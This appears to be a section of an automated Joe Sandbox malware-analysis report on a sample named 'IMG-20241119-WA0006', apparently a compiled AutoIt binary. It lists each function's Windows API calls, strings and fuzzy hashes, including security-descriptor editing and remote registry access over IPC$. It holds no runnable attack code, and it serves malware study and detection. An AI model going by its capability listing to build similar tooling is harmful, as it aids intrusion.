CloseHandle.KERNEL32(00000000), ref: 000EE783
GlobalLock.KERNEL32(00000000), ref: 000EE78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000EE79B
GlobalUnlock.KERNEL32(00000000), ref: 000EE7A4
CloseHandle.KERNEL32(00000000), ref: 000EE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000EE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0010D9BC,?), ref: 000EE7D5
GlobalFree.KERNEL32(00000000), ref: 000EE7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 000EE809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 000EE834
DeleteObject.GDI32(00000000), ref: 000EE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000EE872

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 204d9e302a9b2fffda784a65f15e1f0c7306bf5a2e76be529389d488633a9340
Instruction ID: e218d44040ed04a4b8056af12b001486a84baae7bef9c91cec848b6b0d8aa952
Opcode Fuzzy Hash: 204d9e302a9b2fffda784a65f15e1f0c7306bf5a2e76be529389d488633a9340
Instruction Fuzzy Hash: 72414A75600249EFDB119FA5EC48EAE7BB8FF89711F108058F949E7260DB709D80CB20

Function 000D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 000D076F
_wcscat.LIBCMT ref: 000D0787
_wcscat.LIBCMT ref: 000D0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000D07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 000D07C2
GetFileAttributesW.KERNEL32(?), ref: 000D07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 000D07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0806

Strings

*.*, xrefs: 000D0845

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 58a2f29cff1e057425671b58204d40c9f1949cf52adec9ec9ce09f70c5f4e3b7
Instruction ID: 1efa728a12e587a0bb729f2c0f75467abc4b52ebe62955facaca7b649c9f2f38
Opcode Fuzzy Hash: 58a2f29cff1e057425671b58204d40c9f1949cf52adec9ec9ce09f70c5f4e3b7
Instruction Fuzzy Hash: 8E818F715043019FCB64EF64C845AAEB7E8BF88314F14882FF889D7351EB30D9548BA2

Function 000EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000EEF3B
GetFocus.USER32 ref: 000EEF4B
GetDlgCtrlID.USER32(00000000), ref: 000EEF56
_memset.LIBCMT ref: 000EF081
GetMenuItemInfoW.USER32 ref: 000EF0AC
GetMenuItemCount.USER32(00000000), ref: 000EF0CC
GetMenuItemID.USER32(?,00000000), ref: 000EF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 000EF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 000EF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000EF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000EF1C8

Strings

0, xrefs: 000EF079

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 72f802241fea4779e91adb5c0f57fe41c5d90cb20132ddd384dd68859950b96e
Instruction ID: 1a67518c71fdaf9279fed8396b8247491913bbf7794e71ce1fd3c762fafe49e5
Opcode Fuzzy Hash: 72f802241fea4779e91adb5c0f57fe41c5d90cb20132ddd384dd68859950b96e
Instruction Fuzzy Hash: B9818F71608386AFDB20CF16DC84ABBBBE5FB88314F00456EF998A7291D770D941CB52

Function 000BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
Part of subcall function 000BABBB: GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
Part of subcall function 000BABBB: GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
Part of subcall function 000BABBB: HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E

Part of subcall function 000BAC56: GetProcessHeap.KERNEL32(00000008,000BA6B5,00000000,00000000,?,000BA6B5,?), ref: 000BAC62
Part of subcall function 000BAC56: HeapAlloc.KERNEL32(00000000,?,000BA6B5,?), ref: 000BAC69
Part of subcall function 000BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BA6B5,?), ref: 000BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BA8CB
_memset.LIBCMT ref: 000BA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BA8FF
GetLengthSid.ADVAPI32(?), ref: 000BA910
GetAce.ADVAPI32(?,00000000,?), ref: 000BA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BA969
GetLengthSid.ADVAPI32(?), ref: 000BA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BA995
HeapAlloc.KERNEL32(00000000), ref: 000BA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BA9BD
CopySid.ADVAPI32(00000000), ref: 000BA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BAA2F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: fd13d009f408b70d030cfe318a7e04540ea111df18132fdce99ba36fd227fc3a
Instruction ID: 5d023ae6088d67c97ebec3e405fd36c83fc342feb6a4aafc5fdaf1c09aed1a9b
Opcode Fuzzy Hash: fd13d009f408b70d030cfe318a7e04540ea111df18132fdce99ba36fd227fc3a
Instruction Fuzzy Hash: 94519DB1A00209AFDF10CFA0DD85EEEBBB9FF05300F048129F815A7291DB749A46CB61

Function 000D9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000D9E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 000D9E42
CreateCompatibleDC.GDI32(?), ref: 000D9E4E
SelectObject.GDI32(00000000,?), ref: 000D9E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 000D9EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 000D9EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 000D9F0F
SelectObject.GDI32(00000006,?), ref: 000D9F17
DeleteObject.GDI32(?), ref: 000D9F20
DeleteDC.GDI32(00000006), ref: 000D9F27
ReleaseDC.USER32(00000000,?), ref: 000D9F32

Strings

(, xrefs: 000D9ED7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5e0307ab2e68f6c8322a3e764936732ca791371f91262eb86b179c99e2e957a0
Instruction ID: 46c5400fae92ac0a6930f9ecf281901678a467b04dc02c5a56e1d09fce38a49b
Opcode Fuzzy Hash: 5e0307ab2e68f6c8322a3e764936732ca791371f91262eb86b179c99e2e957a0
Instruction Fuzzy Hash: CF512B75900309AFCB14CFA8D885EAEBBB9EF48710F14851EF99997350D771A941CB60

Function 000CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 000CCCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 000CCCC5
__swprintf.LIBCMT ref: 000CCD1E
__swprintf.LIBCMT ref: 000CCD37
_wprintf.LIBCMT ref: 000CCDED
_wprintf.LIBCMT ref: 000CCE0B

Strings

^ ERROR, xrefs: 000CCD8F
"%s" (%d) : ==> %s:%s%s, xrefs: 000CCDE8
Line %d (File "%s"):, xrefs: 000CCD18, 000CCD31
"%s" (%d) : ==> %s:, xrefs: 000CCE06
Error: , xrefs: 000CCDB5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 516735db13d398392c440401c9fea175a95274f825947f6c3318ee75bdc82c59
Instruction ID: 4dfa30844631e4d6d99461afdec54776d616ba90535cdd288445709d9482147f
Opcode Fuzzy Hash: 516735db13d398392c440401c9fea175a95274f825947f6c3318ee75bdc82c59
Instruction Fuzzy Hash: E2515A31800609BADF15FBE0CD46EEEB7B8BF05344F10016AF505721A2EB316E99DB61

Function 000CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 000CCA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000CCAB0
__swprintf.LIBCMT ref: 000CCB09
__swprintf.LIBCMT ref: 000CCB22
_wprintf.LIBCMT ref: 000CCBCD
_wprintf.LIBCMT ref: 000CCBEB

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 000CCBC8
Line %d (File "%s"):, xrefs: 000CCB03, 000CCB1C
"%s" (%d) : ==> %s:, xrefs: 000CCBE6
Error: , xrefs: 000CCB95
^ ERROR , xrefs: 000CCB64

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: baa1aacddd199245252d3137608b94aaaef822d64e366b6f9cf2f621184595f4
Instruction ID: 9efd34c8967ce46392335639a795a73a4be224bf4ee36731cb194f72f56799f1
Opcode Fuzzy Hash: baa1aacddd199245252d3137608b94aaaef822d64e366b6f9cf2f621184595f4
Instruction Fuzzy Hash: E7515931900609AADF15FBE0DD46EEEB7B8BF05344F10006AF509721A2EB716E99DB61

Function 000C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 000C5664
GetMenuItemCount.USER32(00141708), ref: 000C56ED
DeleteMenu.USER32(00141708,00000005,00000000,000000F5,?,?), ref: 000C577D
DeleteMenu.USER32(00141708,00000004,00000000), ref: 000C5785
DeleteMenu.USER32(00141708,00000006,00000000), ref: 000C578D
DeleteMenu.USER32(00141708,00000003,00000000), ref: 000C5795
GetMenuItemCount.USER32(00141708), ref: 000C579D
SetMenuItemInfoW.USER32(00141708,00000004,00000000,00000030), ref: 000C57D3
GetCursorPos.USER32(?), ref: 000C57DD
SetForegroundWindow.USER32(00000000), ref: 000C57E6
TrackPopupMenuEx.USER32(00141708,00000000,?,00000000,00000000,00000000), ref: 000C57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000C5805

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 5034b5a392461b404ea4ed8b4561c0351880abb6749e93d4ed0c33ec887cb823
Instruction ID: 0e23c5b721755a052185740476819edf104cf861ba58a4134f47283449a81dcf
Opcode Fuzzy Hash: 5034b5a392461b404ea4ed8b4561c0351880abb6749e93d4ed0c33ec887cb823
Instruction Fuzzy Hash: B971E478640A15BFEB209B54DC49FAEBFA5FF00369F240209F514AB1E1C7B16C90DB91

Function 000BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000BA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000BA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000BA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000BA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000BA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000BA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BA2AB

Strings

\IPC$, xrefs: 000BA1F3
SOFTWARE\Classes\, xrefs: 000BA17D
\CLSID, xrefs: 000BA193

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 32c879196cb0662405374688ebb9eb3d2f54368ed7a99549c7d412db4286c1ed
Instruction ID: ee65695a089d61722ce35d647e25ff3ab657713f5ace5b130efa9cd534f6599e
Opcode Fuzzy Hash: 32c879196cb0662405374688ebb9eb3d2f54368ed7a99549c7d412db4286c1ed
Instruction Fuzzy Hash: 7A41F676D10229ABDF21EBA4EC85DEEB7B8BF04300F00456AF845B31A1EB719E45CB50

Function 000E3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2BB5,?,?), ref: 000E3C1D

Strings

HKCC, xrefs: 000E3CD1
HKEY_CURRENT_USER, xrefs: 000E3CE2
HKEY_CURRENT_CONFIG, xrefs: 000E3CC0
HKEY_LOCAL_MACHINE, xrefs: 000E3C6C
HKLM, xrefs: 000E3C81
HKCR, xrefs: 000E3CAB
HKU, xrefs: 000E3D15
HKEY_USERS, xrefs: 000E3D04
HKEY_CLASSES_ROOT, xrefs: 000E3C96
HKCU, xrefs: 000E3CF3

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 15969196536d29b3c05bec6525f11d1066f4daa57845c8e807ca2e3ae12aa09b
Instruction ID: 189f2b9469c0978eebe4b357fa085f0849b279675bd9c42391355b718adfc27e
Opcode Fuzzy Hash: 15969196536d29b3c05bec6525f11d1066f4daa57845c8e807ca2e3ae12aa09b
Instruction Fuzzy Hash: E9411A705042CA9FDF10EF11E955AEA3BA5BF12340F504854ECA67B392EB70EE4A9B50

Function 000C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000F36F4,00000010,?,Bad directive syntax error,0011DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 000C25D6
LoadStringW.USER32(00000000,?,000F36F4,00000010), ref: 000C25DD
_wprintf.LIBCMT ref: 000C2610
__swprintf.LIBCMT ref: 000C2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000C26A1

Strings

Line %d (File "%s"):, xrefs: 000C2647
., xrefs: 000C2687
Error: , xrefs: 000C266F
%s (%d) : ==> %s.: %s %s, xrefs: 000C260B
Line %d:, xrefs: 000C262C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 90cd9e2abb1076509a7f50e5ff0f2f0be95b78daa3e88f88867d108e7a462970
Instruction ID: c13932b8aa71850d9f10d1c25aedd2469d9db1aab7ecd085f73bac86cb60b52b
Opcode Fuzzy Hash: 90cd9e2abb1076509a7f50e5ff0f2f0be95b78daa3e88f88867d108e7a462970
Instruction Fuzzy Hash: D2212A3180021AAFDF12BB90CC4AFEE7B79BF19304F044469F555660A3EB71A668DB61

Function 000C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000C7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000C7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000C7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000C7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000C7B8C

Strings

alias PlayMe, xrefs: 000C7B1B
close PlayMe, xrefs: 000C7B53, 000C7B80
status PlayMe mode, xrefs: 000C7B3D
open , xrefs: 000C7AF1
play PlayMe wait, xrefs: 000C7B76
play PlayMe, xrefs: 000C7B87

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 7066c48ffab6979ef6b92c8639721bb8081b0d3196f1eb8fe9fbdfbd407c234c
Instruction ID: 31507964e54fa51d1d62b8a9726764c412056a71a046010458fe240cafd80682
Opcode Fuzzy Hash: 7066c48ffab6979ef6b92c8639721bb8081b0d3196f1eb8fe9fbdfbd407c234c
Instruction Fuzzy Hash: 4E11C4A164025979D720B3A1CC4AEFF7EBCFBD1B10F0004297465A60C2EF701E48CAB1

Function 000C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 000C7794

Part of subcall function 0009DC38: timeGetTime.WINMM(?,75C0B400,000F58AB), ref: 0009DC3C

Sleep.KERNEL32(0000000A), ref: 000C77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 000C77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 000C7806
SetActiveWindow.USER32 ref: 000C7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000C7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 000C7852
Sleep.KERNEL32(000000FA), ref: 000C785D
IsWindow.USER32 ref: 000C7869
EndDialog.USER32(00000000), ref: 000C787A

Strings

BUTTON, xrefs: 000C77F8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 3163ac02c65bedf1bc79d32dba860b8d60d75907abe9f6233f77e3e015172d41
Instruction ID: a5fb6574f62b8722afdff4cc1cb1caa00a3702bcd392178fe30ce477f23d9400
Opcode Fuzzy Hash: 3163ac02c65bedf1bc79d32dba860b8d60d75907abe9f6233f77e3e015172d41
Instruction Fuzzy Hash: 5D216FB4248209AFE7115FA0EC89F2A7F79FB45349F400128F569829B2DFB15D84DE21

Function 000D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CoInitialize.OLE32(00000000), ref: 000D034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000D03DE
SHGetDesktopFolder.SHELL32(?), ref: 000D03F2
CoCreateInstance.OLE32(0010DA8C,00000000,00000001,00133CF8,?), ref: 000D043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000D04AD
CoTaskMemFree.OLE32(?,?), ref: 000D0505
